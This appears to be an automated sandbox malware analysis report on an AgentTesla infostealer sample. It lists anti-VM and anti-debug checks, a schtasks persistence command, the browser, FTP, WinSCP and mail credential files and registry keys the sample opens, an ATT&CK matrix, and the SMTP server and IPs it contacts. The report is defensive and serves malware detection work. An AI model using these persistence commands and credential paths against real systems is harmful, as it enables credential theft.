                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM_3Show sources
                      Source: Yara matchFile source: 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4019223246.exe PID: 7056, type: MEMORY
                      Source: Yara matchFile source: 1.2.4019223246.exe.2c70544.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.4019223246.exe.2ca93cc.2.raw.unpack, type: UNPACKEDPE
                      Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                      Source: C:\Users\user\Desktop\4019223246.exeFunction Chain: systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,processSet,processSet,memAlloc,memAlloc,memAlloc,memAlloc,threadDelayed
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeWindow / User API: threadDelayed 619Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 7060Thread sleep time: -102727s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524Thread sleep count: 619 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524Thread sleep time: -18570000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\4019223246.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\4019223246.exeLast function: Thread delayed
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 4019223246.exe, 00000004.00000002.912265760.0000000000C57000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CDC9
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0040AD70 GetProcessHeap,HeapFree,4_2_0040AD70
                      Source: C:\Users\user\Desktop\4019223246.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CDC9
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0040E5DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E5DC
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00416F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F2A
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004123B1 SetUnhandledExceptionFilter,4_2_004123B1
                      Source: C:\Users\user\Desktop\4019223246.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess created: C:\Users\user\Desktop\4019223246.exe C:\Users\user\Desktop\4019223246.exeJump to behavior
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: GetLocaleInfoA,4_2_004179E0
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Users\user\Desktop\4019223246.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004129D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_004129D5
                      Source: C:\Users\user\Desktop\4019223246.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.914560852.0000000004FE0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.657508762.0000000000BE4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.912388878.00000000025A2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.912715120.00000000029F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4019223246.exe PID: 6104, type: MEMORY
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e301e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e23258.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e24140.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e2136.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.4019223246.exe.be4648.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e2136.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.4019223246.exe.be4648.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.4fe0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0ee8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e73010.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e301e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e23258.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e73010.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e24140.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0ee8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.4fe0000.11.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\4019223246.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4019223246.exe PID: 6104, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.914560852.0000000004FE0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.657508762.0000000000BE4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.912388878.00000000025A2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.912715120.00000000029F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4019223246.exe PID: 6104, type: MEMORY
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e301e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e23258.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e24140.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e2136.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.4019223246.exe.be4648.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e2136.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.4019223246.exe.be4648.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.4fe0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0ee8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e73010.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.25e301e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e23258.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e73010.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.3e24140.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.29f0ee8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.4019223246.exe.4fe0000.11.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401EB6 _memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401EB6

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools11OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1Credentials in Registry1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery125SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSQuery Registry1Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsSecurity Software Discovery251SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion14Cached Domain CredentialsVirtualization/Sandbox Evasion14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 358326 Sample: 4019223246.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Sigma detected: Scheduled temp file as task from temp location 2->33 35 Yara detected AgentTesla 2->35 37 5 other signatures 2->37 7 4019223246.exe 7 2->7         started        process3 file4 19 C:\Users\user\AppData\...\WZXjvtGBEKK.exe, PE32 7->19 dropped 21 C:\Users\...\WZXjvtGBEKK.exe:Zone.Identifier, ASCII 7->21 dropped 23 C:\Users\user\AppData\Local\Temp\tmp35E.tmp, XML 7->23 dropped 25 C:\Users\user\AppData\...\4019223246.exe.log, ASCII 7->25 dropped 39 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->39 41 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->41 43 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 7->43 11 4019223246.exe 10 7->11         started        15 schtasks.exe 1 7->15         started        signatures5 process6 dnsIp7 27 us2.smtp.mailhostbox.com 208.91.198.143, 49767, 587 PUBLIC-DOMAIN-REGISTRYUS United States 11->27 29 208.91.199.224, 49769, 587 PUBLIC-DOMAIN-REGISTRYUS United States 11->29 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 17 conhost.exe 15->17         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      4019223246.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe9%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://wg3NmRd1lkGGL4Op.org0%Avira URL Cloudsafe
                      http://wg3NmRd1lkGGL4Op.orghb0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://qpQMsG.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.198.143
                      truefalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.14019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNS4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://wg3NmRd1lkGGL4Op.org4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://wg3NmRd1lkGGL4Op.orghb4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
